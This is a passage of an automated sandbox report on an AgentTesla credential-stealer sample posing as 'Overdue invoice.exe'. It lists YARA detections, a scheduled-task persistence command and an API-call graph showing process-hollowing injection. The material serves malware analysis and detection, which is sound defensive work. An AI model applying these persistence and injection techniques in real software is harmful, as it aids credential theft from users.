                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        General

                                                                        Target ID:3
                                                                        Start time:12:53:33
                                                                        Start date:27/05/2022
                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp
                                                                        Imagebase:0xf00000
                                                                        File size:185856 bytes
                                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Target ID:4
                                                                        Start time:12:53:34
                                                                        Start date:27/05/2022
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7c9170000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Target ID:5
                                                                        Start time:12:53:34
                                                                        Start date:27/05/2022
                                                                        Path:C:\Users\user\Desktop\Overdue invoice.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:{path}
                                                                        Imagebase:0x2f0000
                                                                        File size:731648 bytes
                                                                        MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low

                                                                        General

                                                                        Target ID:7
                                                                        Start time:12:53:35
                                                                        Start date:27/05/2022
                                                                        Path:C:\Users\user\Desktop\Overdue invoice.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:{path}
                                                                        Imagebase:0xfe0000
                                                                        File size:731648 bytes
                                                                        MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.295945880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.295945880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.295465407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.295465407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.294210578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.294210578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        General

                                                                        Target ID:15
                                                                        Start time:12:53:53
                                                                        Start date:27/05/2022
                                                                        Path:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
                                                                        Imagebase:0x8d0000
                                                                        File size:731648 bytes
                                                                        MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.378013888.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000002.378013888.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 60%, ReversingLabs
                                                                        Reputation:low

                                                                        General

                                                                        Target ID:16
                                                                        Start time:12:54:01
                                                                        Start date:27/05/2022
                                                                        Path:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
                                                                        Imagebase:0x830000
                                                                        File size:731648 bytes
                                                                        MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.373874318.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000010.00000002.373874318.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        General

                                                                        Target ID:17
                                                                        Start time:12:54:05
                                                                        Start date:27/05/2022
                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmp
                                                                        Imagebase:0xf00000
                                                                        File size:185856 bytes
                                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Target ID:18
                                                                        Start time:12:54:06
                                                                        Start date:27/05/2022
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7c9170000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Target ID:19
                                                                        Start time:12:54:06
                                                                        Start date:27/05/2022
                                                                        Path:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:{path}
                                                                        Imagebase:0xbe0000
                                                                        File size:731648 bytes
                                                                        MD5 hash:21C2F8CC3F1D71FFB036CA3788A346B6
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000000.366994504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000000.366994504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000000.365073156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000000.365073156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000000.365965578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000000.365965578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.519516875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000002.519516875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:11.9%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:7%
                                                                          Total number of Nodes:215
                                                                          Total number of Limit Nodes:13
                                                                          execution_graph 22023 c26260 22024 c26262 22023->22024 22027 c25344 22024->22027 22026 c2626d 22028 c2534f 22027->22028 22031 c25394 22028->22031 22030 c26345 22030->22026 22032 c2539f 22031->22032 22035 c253c4 22032->22035 22034 c2682a 22034->22030 22036 c253cf 22035->22036 22039 c263e0 22036->22039 22038 c26922 22038->22034 22041 c263eb 22039->22041 22040 c2707c 22040->22038 22041->22040 22043 c2b150 22041->22043 22045 c2b154 22043->22045 22044 c2b1a5 22044->22040 22045->22044 22048 c2b408 22045->22048 22052 c2b418 22045->22052 22050 c2b40c 22048->22050 22049 c2b45f 22049->22044 22050->22049 22056 c29480 22050->22056 22053 c2b41a 22052->22053 22054 c2b45f 22053->22054 22055 c29480 3 API calls 22053->22055 22054->22044 22055->22054 22058 c2948b 22056->22058 22057 c2c158 22058->22057 22060 c2b7a4 22058->22060 22061 c2b7af 22060->22061 22062 c263e0 3 API calls 22061->22062 22063 c2c1c7 22061->22063 22062->22063 22067 c2df50 22063->22067 22076 c2df38 22063->22076 22064 c2c200 22064->22057 22069 c2df81 22067->22069 22070 c2e073 22067->22070 22068 c2df8d 22068->22064 22069->22068 22084 c2e293 22069->22084 22087 c2e298 22069->22087 22070->22064 22071 c2dfce 22071->22070 22090 c2ec60 22071->22090 22102 c2ec4f 22071->22102 22077 c2df42 22076->22077 22078 c2df8d 22076->22078 22077->22078 22080 c2e293 2 API calls 22077->22080 22081 c2e298 2 API calls 22077->22081 22078->22064 22079 c2dfce 22079->22078 22082 c2ec60 2 API calls 22079->22082 22083 c2ec4f 2 API calls 22079->22083 22080->22079 22081->22079 22082->22078 22083->22078 22085 c29530 GetModuleHandleW GetModuleHandleW 22084->22085 22086 c2e2a1 22085->22086 22086->22071 22088 c29530 GetModuleHandleW GetModuleHandleW 22087->22088 22089 c2e2a1 22087->22089 22088->22089 22089->22071 22091 c2ec62 22090->22091 22092 c2d784 GetModuleHandleW 22091->22092 22093 c2ecec 22092->22093 22098 c2f160 GetModuleHandleW 22093->22098 22099 c2d784 GetModuleHandleW 22093->22099 22100 c2f0b8 GetModuleHandleW 22093->22100 22094 c2ed08 22095 c2911c GetModuleHandleW 22094->22095 22097 c2ed31 22094->22097 22096 c2ed5b 22095->22096 22101 c2f900 CreateWindowExW 22096->22101 22098->22094 22099->22094 22100->22094 22101->22097 22103 c2ec58 22102->22103 22104 c2d784 GetModuleHandleW 22103->22104 22105 c2ecec 22104->22105 22111 c2f160 GetModuleHandleW 22105->22111 22112 c2d784 GetModuleHandleW 22105->22112 22113 c2f0b8 GetModuleHandleW 22105->22113 22106 c2ed08 22107 c2911c GetModuleHandleW 22106->22107 22109 c2ed31 22106->22109 22108 c2ed5b 22107->22108 22110 c2f900 CreateWindowExW 22108->22110 22110->22109 22111->22106 22112->22106 22113->22106 22114 c2bb60 DuplicateHandle 22115 c2bbf6 22114->22115 22116 c29030 22117 c2903f 22116->22117 22119 c29530 22116->22119 22127 c2911c 22119->22127 22122 c29553 22123 c2955b 22122->22123 22124 c29758 GetModuleHandleW 22122->22124 22123->22117 22125 c29785 22124->22125 22125->22117 22128 c29710 GetModuleHandleW 22127->22128 22130 c29543 22128->22130 22130->22123 22131 c297a8 22130->22131 22132 c297b4 22131->22132 22133 c2911c GetModuleHandleW 22132->22133 22134 c297cc 22133->22134 22134->22122 22135 c2b530 GetCurrentProcess 22136 c2b5a3 22135->22136 22137 c2b5aa GetCurrentThread 22135->22137 22136->22137 22138 c2b5e0 22137->22138 22139 c2b5e7 GetCurrentProcess 22137->22139 22138->22139 22140 c2b61d 22139->22140 22141 c2b645 GetCurrentThreadId 22140->22141 22142 c2b676 22141->22142 22002 2733c20 22003 2733dab 22002->22003 22004 2733c46 22002->22004 22004->22003 22009 c2fca0 SetWindowLongW 22004->22009 22011 c2fc99 22004->22011 22015 2733ea0 PostMessageW 22004->22015 22017 2733e98 PostMessageW 22004->22017 22010 c2fd0c 22009->22010 22010->22004 22012 c2fc9e SetWindowLongW 22011->22012 22013 c2fc9c 22011->22013 22014 c2fd0c 22012->22014 22013->22012 22014->22004 22016 2733f0c 22015->22016 22016->22004 22018 2733f0c 22017->22018 22018->22004 22019 c29998 22020 c299e0 LoadLibraryExW 22019->22020 22021 c299da 22019->22021 22022 c29a11 22020->22022 22021->22020 21868 27304ff 21872 2731678 21868->21872 21877 2731688 21868->21877 21869 273050b 21873 2731688 21872->21873 21874 2731714 21873->21874 21882 27319c0 21873->21882 21894 27319b0 21873->21894 21874->21869 21879 27316a5 21877->21879 21878 2731714 21878->21869 21879->21878 21880 27319c0 14 API calls 21879->21880 21881 27319b0 14 API calls 21879->21881 21880->21879 21881->21879 21883 27319e7 21882->21883 21884 2731a47 21883->21884 21906 2732340 21883->21906 21910 2732c12 21883->21910 21916 2732763 21883->21916 21920 2732003 21883->21920 21925 27329ee 21883->21925 21929 27323c8 21883->21929 21933 2732f59 21883->21933 21937 27325f9 21883->21937 21942 27326db 21883->21942 21884->21873 21896 27319bf 21894->21896 21895 2731a47 21895->21873 21896->21895 21897 2732003 3 API calls 21896->21897 21898 2732763 2 API calls 21896->21898 21899 2732c12 3 API calls 21896->21899 21900 2732340 2 API calls 21896->21900 21901 27326db 3 API calls 21896->21901 21902 27325f9 3 API calls 21896->21902 21903 2732f59 WriteProcessMemory 21896->21903 21904 27323c8 2 API calls 21896->21904 21905 27329ee 2 API calls 21896->21905 21897->21896 21898->21896 21899->21896 21900->21896 21901->21896 21902->21896 21903->21896 21904->21896 21905->21896 21947 2733730 21906->21947 21951 2733738 21906->21951 21907 2732358 21911 2732c18 21910->21911 21954 2733b80 21911->21954 21957 2733b2a 21911->21957 21962 2733b7a 21911->21962 21912 2732c34 21965 2733672 21916->21965 21969 2733678 21916->21969 21917 273277b 21973 27339c0 21920->21973 21977 27339c8 21920->21977 21981 273397a 21920->21981 21921 273201b 21986 2733800 21925->21986 21990 2733808 21925->21990 21926 2732a03 21994 2733308 21929->21994 21998 27332fe 21929->21998 21934 2732f5f 21933->21934 21935 2732f97 21934->21935 21936 273397a WriteProcessMemory 21934->21936 21935->21883 21936->21934 21939 27339c0 WriteProcessMemory 21937->21939 21940 273397a WriteProcessMemory 21937->21940 21941 27339c8 WriteProcessMemory 21937->21941 21938 2732613 21939->21938 21940->21938 21941->21938 21944 27339c0 WriteProcessMemory 21942->21944 21945 273397a WriteProcessMemory 21942->21945 21946 27339c8 WriteProcessMemory 21942->21946 21943 27326ff 21944->21943 21945->21943 21946->21943 21948 2733735 ReadProcessMemory 21947->21948 21950 27337c6 21948->21950 21950->21907 21952 2733783 ReadProcessMemory 21951->21952 21953 27337c6 21952->21953 21953->21907 21955 2733bc1 ResumeThread 21954->21955 21956 2733bee 21955->21956 21956->21912 21958 2733b6f ResumeThread 21957->21958 21961 2733b33 21957->21961 21960 2733bee 21958->21960 21960->21912 21961->21912 21963 2733bc1 ResumeThread 21962->21963 21964 2733bee 21963->21964 21964->21912 21966 27336c0 SetThreadContext 21965->21966 21968 27336fe 21966->21968 21968->21917 21970 27336c0 SetThreadContext 21969->21970 21972 27336fe 21970->21972 21972->21917 21974 2733a13 WriteProcessMemory 21973->21974 21976 2733a64 21974->21976 21976->21921 21978 2733a13 WriteProcessMemory 21977->21978 21980 2733a64 21978->21980 21980->21921 21982 2733983 21981->21982 21983 27339bf WriteProcessMemory 21981->21983 21982->21921 21985 2733a64 21983->21985 21985->21921 21987 2733803 VirtualAllocEx 21986->21987 21989 2733882 21987->21989 21989->21926 21991 273383f VirtualAllocEx 21990->21991 21993 2733882 21991->21993 21993->21926 21995 273333f CreateProcessW 21994->21995 21997 2733470 21995->21997 21999 2733303 CreateProcessW 21998->21999 22001 2733470 21999->22001 22143 726bd58 22144 726bda0 VirtualProtect 22143->22144 22145 726bdda 22144->22145

                                                                          Executed Functions

                                                                          Function 0726C268 Relevance: 6.5, Strings: 5, Instructions: 288COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 726c268-726c282 1 726c284 0->1 2 726c289-726c2ef call 726d3c0 call 726d688 0->2 1->2 9 726c2fa 2->9 10 726c301-726c31d 9->10 11 726c326-726c327 10->11 12 726c31f 10->12 14 726c6e5-726c6eb 11->14 12->9 12->11 13 726c367-726c370 12->13 12->14 15 726c3a2-726c3ab 12->15 16 726c32c-726c335 12->16 17 726c52d-726c536 12->17 18 726c4aa-726c4b3 12->18 19 726c62a-726c633 12->19 20 726c412-726c478 12->20 21 726c5f2-726c5fb 12->21 22 726c6b0-726c6b9 12->22 23 726c3dd-726c3e6 12->23 26 726c377-726c39d 13->26 27 726c372 13->27 36 726c3b2-726c3d8 15->36 37 726c3ad 15->37 38 726c337 16->38 39 726c33c-726c365 16->39 32 726c53d-726c59c 17->32 33 726c538 17->33 34 726c4b5 18->34 35 726c4ba-726c4d7 18->35 28 726c635 19->28 29 726c63a-726c654 19->29 71 726c47f-726c482 call 726ed38 20->71 72 726c47a 20->72 40 726c602-726c625 21->40 41 726c5fd 21->41 30 726c6c0-726c6e0 22->30 31 726c6bb 22->31 24 726c3ed-726c40d 23->24 25 726c3e8 23->25 24->10 25->24 26->10 27->26 28->29 54 726c656 29->54 55 726c65b-726c67b 29->55 30->10 31->30 74 726c5a3-726c5c0 32->74 75 726c59e 32->75 33->32 34->35 52 726c4de-726c4fb 35->52 53 726c4d9 35->53 36->10 37->36 38->39 39->10 40->10 41->40 61 726c502-726c528 52->61 62 726c4fd 52->62 53->52 54->55 63 726c682-726c6ab 55->63 64 726c67d 55->64 61->10 62->61 63->10 64->63 76 726c488-726c4a5 71->76 72->71 78 726c5c7-726c5ed 74->78 79 726c5c2 74->79 75->74 76->10 78->10 79->78
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: !l\$QO$S$e$%j$lYQ$iE9
                                                                          • API String ID: 0-3094461243
                                                                          • Opcode ID: 9c5b19cb6c3f84ea73d583627d18be775ecc6a02a3170ef1e85021a6efb23c52
                                                                          • Instruction ID: 2b10a5742fea4ae89a9a7a6d4992001715258e1c37c82f17474e988ed09b2adf
                                                                          • Opcode Fuzzy Hash: 9c5b19cb6c3f84ea73d583627d18be775ecc6a02a3170ef1e85021a6efb23c52
                                                                          • Instruction Fuzzy Hash: 30D19070A25245DFDB14EFA5D98899DBBF2FF48705B14C46AE409EB3A4DB30A890CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07266369 Relevance: 1.6, Strings: 1, Instructions: 390COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 379 7266369-72663c0 382 72663c2-7266410 379->382 383 726641f-7266445 379->383 387 7266412-7266416 382->387 388 7266418 382->388 384 7266447 383->384 385 726644c-7266488 383->385 384->385 458 726648a call 7266a12 385->458 459 726648a call 7266a20 385->459 387->388 388->383 390 726641a-726641c 388->390 390->383 391 7266490 392 7266497-72664b3 391->392 393 72664b5 392->393 394 72664bc-72664bd 392->394 393->391 393->394 395 72667a5-72667bc 393->395 396 7266623-726662f 393->396 397 72666a1-72666a5 393->397 398 72667ee-72667f2 393->398 399 726666e-7266680 393->399 400 726652b-726652f 393->400 401 72664e9-72664f6 393->401 402 7266572-726657e 393->402 403 72664f8-7266526 393->403 404 72665f9-7266605 393->404 405 72665c6-72665da 393->405 406 7266685-726669c 393->406 407 7266705-726671a 393->407 408 72664c2-72664e7 393->408 409 72667c1-72667cd 393->409 410 7266841-7266848 393->410 411 7266657-7266669 393->411 412 7266754-7266760 393->412 413 72666d1-72666dd 393->413 414 726681e-726683c 393->414 415 72665df-72665f4 393->415 416 726671f-7266728 393->416 417 726655b-726656d 393->417 394->410 395->392 420 7266636-7266652 396->420 421 7266631 396->421 426 72666a7-72666b6 397->426 427 72666b8-72666bf 397->427 428 72667f4-7266803 398->428 429 7266805-726680c 398->429 399->392 424 7266542-7266549 400->424 425 7266531-7266540 400->425 401->392 430 7266585-726659b 402->430 431 7266580 402->431 403->392 418 7266607 404->418 419 726660c 404->419 405->392 406->392 407->392 408->392 422 72667d4-72667e9 409->422 423 72667cf 409->423 411->392 436 7266767-726677d 412->436 437 7266762 412->437 432 72666e4-7266700 413->432 433 72666df 413->433 414->392 415->392 434 726672a-7266739 416->434 435 726673b-7266742 416->435 417->392 418->419 446 7266616-726661e 419->446 420->392 421->420 422->392 423->422 440 7266550-7266556 424->440 425->440 441 72666c6-72666cc 426->441 427->441 442 7266813-7266819 428->442 429->442 454 72665a2-72665c1 430->454 455 726659d 430->455 431->430 432->392 433->432 444 7266749-726674f 434->444 435->444 451 7266784-72667a0 436->451 452 726677f 436->452 437->436 440->392 441->392 442->392 444->392 446->392 451->392 452->451 454->392 455->454 458->391 459->391
                                                                          Strings
                                                                          • d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",03,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",02,", xrefs: 072665B7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",03,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",02,"
                                                                          • API String ID: 0-832420553
                                                                          • Opcode ID: 66c4c34c7bb3b5fccb3e44661f9c2b8423093db3a8db5304d0c8276fd1793680
                                                                          • Instruction ID: e2bfdc2156771154349b8da889bb6587615402a722c6fd72372fd7415318ace5
                                                                          • Opcode Fuzzy Hash: 66c4c34c7bb3b5fccb3e44661f9c2b8423093db3a8db5304d0c8276fd1793680
                                                                          • Instruction Fuzzy Hash: B6E18BB5A2820ADFCB14CFA5D4858EEFBB2FF89311F10855BD405AB254D734A982CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 07266329 Relevance: 1.6, Strings: 1, Instructions: 386COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 460 7266329-726632c 461 726632e-7266334 460->461 462 726638c-7266391 460->462 463 7266392-72663c0 461->463 464 7266336-726634b 461->464 462->463 465 72663c2-7266410 463->465 466 726641f-7266445 463->466 464->462 472 7266412-7266416 465->472 473 7266418 465->473 467 7266447 466->467 468 726644c-7266488 466->468 467->468 543 726648a call 7266a12 468->543 544 726648a call 7266a20 468->544 472->473 473->466 475 726641a-726641c 473->475 475->466 476 7266490 477 7266497-72664b3 476->477 478 72664b5 477->478 479 72664bc-72664bd 477->479 478->476 478->479 480 72667a5-72667bc 478->480 481 7266623-726662f 478->481 482 72666a1-72666a5 478->482 483 72667ee-72667f2 478->483 484 726666e-7266680 478->484 485 726652b-726652f 478->485 486 72664e9-72664f6 478->486 487 7266572-726657e 478->487 488 72664f8-7266526 478->488 489 72665f9-7266605 478->489 490 72665c6-72665da 478->490 491 7266685-726669c 478->491 492 7266705-726671a 478->492 493 72664c2-72664e7 478->493 494 72667c1-72667cd 478->494 495 7266841-7266848 478->495 496 7266657-7266669 478->496 497 7266754-7266760 478->497 498 72666d1-72666dd 478->498 499 726681e-726683c 478->499 500 72665df-72665f4 478->500 501 726671f-7266728 478->501 502 726655b-726656d 478->502 479->495 480->477 505 7266636-7266652 481->505 506 7266631 481->506 511 72666a7-72666b6 482->511 512 72666b8-72666bf 482->512 513 72667f4-7266803 483->513 514 7266805-726680c 483->514 484->477 509 7266542-7266549 485->509 510 7266531-7266540 485->510 486->477 515 7266585-726659b 487->515 516 7266580 487->516 488->477 503 7266607 489->503 504 726660c 489->504 490->477 491->477 492->477 493->477 507 72667d4-72667e9 494->507 508 72667cf 494->508 496->477 521 7266767-726677d 497->521 522 7266762 497->522 517 72666e4-7266700 498->517 518 72666df 498->518 499->477 500->477 519 726672a-7266739 501->519 520 726673b-7266742 501->520 502->477 503->504 531 7266616-726661e 504->531 505->477 506->505 507->477 508->507 525 7266550-7266556 509->525 510->525 526 72666c6-72666cc 511->526 512->526 527 7266813-7266819 513->527 514->527 539 72665a2-72665c1 515->539 540 726659d 515->540 516->515 517->477 518->517 529 7266749-726674f 519->529 520->529 536 7266784-72667a0 521->536 537 726677f 521->537 522->521 525->477 526->477 527->477 529->477 531->477 536->477 537->536 539->477 540->539 543->476 544->476
                                                                          Strings
                                                                          • d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",03,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",02,", xrefs: 072665B7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",03,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",02,"
                                                                          • API String ID: 0-832420553
                                                                          • Opcode ID: 713a49118d3f5b0aaf329e266d9c42188f4fc88a4413f579405d07980f0eee66
                                                                          • Instruction ID: 9666f64853746ca4fb2c12cd8de4efbef42f7965321fba74630c31e0b2b759ed
